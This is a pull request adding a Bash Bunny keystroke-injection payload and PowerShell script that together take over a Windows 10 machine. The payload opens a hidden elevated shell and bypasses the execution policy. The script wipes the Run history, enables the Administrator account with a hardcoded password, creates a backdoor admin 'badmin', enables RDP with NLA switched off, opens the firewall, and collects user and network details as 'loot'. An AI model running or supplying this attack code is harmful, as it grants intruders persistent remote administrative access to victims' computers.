### PR TITLE
Enable RDP, disable NLA, log network information.

### DIFF
--- a/payloads/library/remote_access/RDP-Enable/README.md
+++ b/payloads/library/remote_access/RDP-Enable/README.md
@@ -1,0 +1,28 @@
+# Enable-RDP
+
+* Author: Mike Galvin
+* Version: Version 1.0
+* Category: Enabling services and accounts
+* Target: Windows 10 / Powershell
+
+[Mike Galvin's site](https://gal.vin)
+Twitter:[@mikegalvin_](https://twitter.com/mikegalvin_)
+
+## Description
+
+This payload will launch an elevated PowerShell session and run p.ps1.
+
+The script will enable RDP without NLA, enable the RDP firewall rules in Windows firewall and enable the local admin user and set a password configurable in the script.
+The script also creates another admin user just in case.
+
+### Configuration
+
+You can configure the password and new user account name using the variables at the top of p.ps1.
+
+### Status
+
+| LED    | Status               |
+| ------ | ---------------------|
+| SETUP  | Setting up attack    |
+| ATTACK | Injecting keystrokes |
+| FINISH | Done                 |

--- a/payloads/library/remote_access/RDP-Enable/p.ps1
+++ b/payloads/library/remote_access/RDP-Enable/p.ps1
@@ -1,0 +1,57 @@
+﻿# Vars for log
+$destFile = ("$env:COMPUTERNAME-{0:yyyy-MM-dd-HH-mm-ss}.log" -f (Get-Date))
+$destPath = ((Get-WmiObject win32_volume -f 'label=''BashBunny''').Name+'loot\badmin')
+$dest = "$destPath\$destFile"
+
+# Vars for user stuff
+$NUser = "badmin"
+$Password = convertto-securestring "th!s15@planetbanna" -asplaintext -force
+$Group = "Administrators"
+
+# Clear Run history
+Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name * -ErrorAction SilentlyContinue
+
+# Enable admin account and set pw
+Enable-LocalUser -Name Administrator -ErrorAction SilentlyContinue
+Set-LocalUser -Name Administrator -PasswordNeverExpires $true -Password $Password -ErrorAction SilentlyContinue
+
+# Create new user and make admin
+New-LocalUser $NUser -Password $Password -PasswordNeverExpires -ErrorAction SilentlyContinue
+Add-LocalGroupMember $Group $NUser -ErrorAction SilentlyContinue
+
+# Enable RDP
+Set-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\' -Name "fDenyTSConnections" -Value 0 -ErrorAction SilentlyContinue
+Set-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\' -Name "UserAuthentication" -Value 0 -ErrorAction SilentlyContinue
+Enable-NetFirewallRule -DisplayGroup "Remote Desktop" -ErrorAction SilentlyContinue
+
+# Log things now
+$rdpenabled = Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\' -Name "fDenyTSConnections" | Select-Object -expandProperty fDenyTSConnections
+If ($rdpenabled -eq 0)
+{
+    Add-Content -Path $dest -Value "$(Get-Date -Format G) RDP enabled: success"
+}
+
+Else
+{
+    Add-Content -Path $dest -Value "$(Get-Date -Format G) RDP enabled: fail"
+}
+
+$rdpinsecure = Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\' -Name "UserAuthentication" | Select-Object -expandProperty UserAuthentication
+If ($rdpinsecure -eq 0)
+{
+    Add-Content -Path $dest -Value "$(Get-Date -Format G) NLA disabled: success"
+}
+
+Else
+{
+    Add-Content -Path $dest -Value "$(Get-Date -Format G) NLA disabled: fail"
+}
+
+Add-Content -Path $dest -Value "$(Get-Date -Format G) RDP group firewall rules status:"
+Get-NetFirewallRule -DisplayGroup "Remote Desktop" | Select-Object DisplayName, Enabled | Out-File -Append -FilePath $dest -Encoding ASCII
+Add-Content -Path $dest -Value "$(Get-Date -Format G) Local users:"
+Get-LocalUser | Out-File -Append -FilePath $dest -Encoding ASCII
+Add-Content -Path $dest -Value "$(Get-Date -Format G) IP Config /all"
+& ipconfig /all | Out-File -Append -FilePath $dest -Encoding ASCII
+Add-Content -Path $dest -Value ""
+Add-Content -Path $dest -Value "Have a nice day ;)"

--- a/payloads/library/remote_access/RDP-Enable/payload.txt
+++ b/payloads/library/remote_access/RDP-Enable/payload.txt
@@ -1,0 +1,37 @@
+############################################################################################
+# Purpose: Enable RDP, fw rules and admin user. Disable NLA. Create admin user just in case.
+# Version: 1.0
+# Author: Mike Galvin
+# Contact: mike@gal.vin or twitter.com/mikegalvin_
+# Date: 2019-10-08
+#############################################################################################
+
+#!/bin/bash
+
+# Options
+LOOTDIR=/root/udisk/loot/badmin
+
+######## INITIALIZATION ########
+LED SETUP
+GET SWITCH_POSITION
+ATTACKMODE HID STORAGE
+
+######## MAKE LOOT DIRECTORY ########
+mkdir -p $LOOTDIR
+
+######## ATTACK ########
+LED ATTACK
+RUN WIN "powershell -windowstyle hidden start-process powershell -verb RunAs"
+sleep 3
+Q ALT Y
+sleep 2
+Q STRING "\$src = (gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\switch1\p.ps1'"
+Q ENTER
+sleep 1
+QUACK STRING "powershell -ep bypass \$src"
+Q ENTER
+Q STRING "exit"
+Q ENTER
+
+######## FINISH ########
+LED FINISH


### PR DESCRIPTION
Created a payload to enable RDP on Windows.

The payload will: 

Enable RDP.
Disable NLA.
Enable the administrator account and set a configurable password.
Create a backup admin account if required.
Log network information.
Log weather or not the attack succeeded.
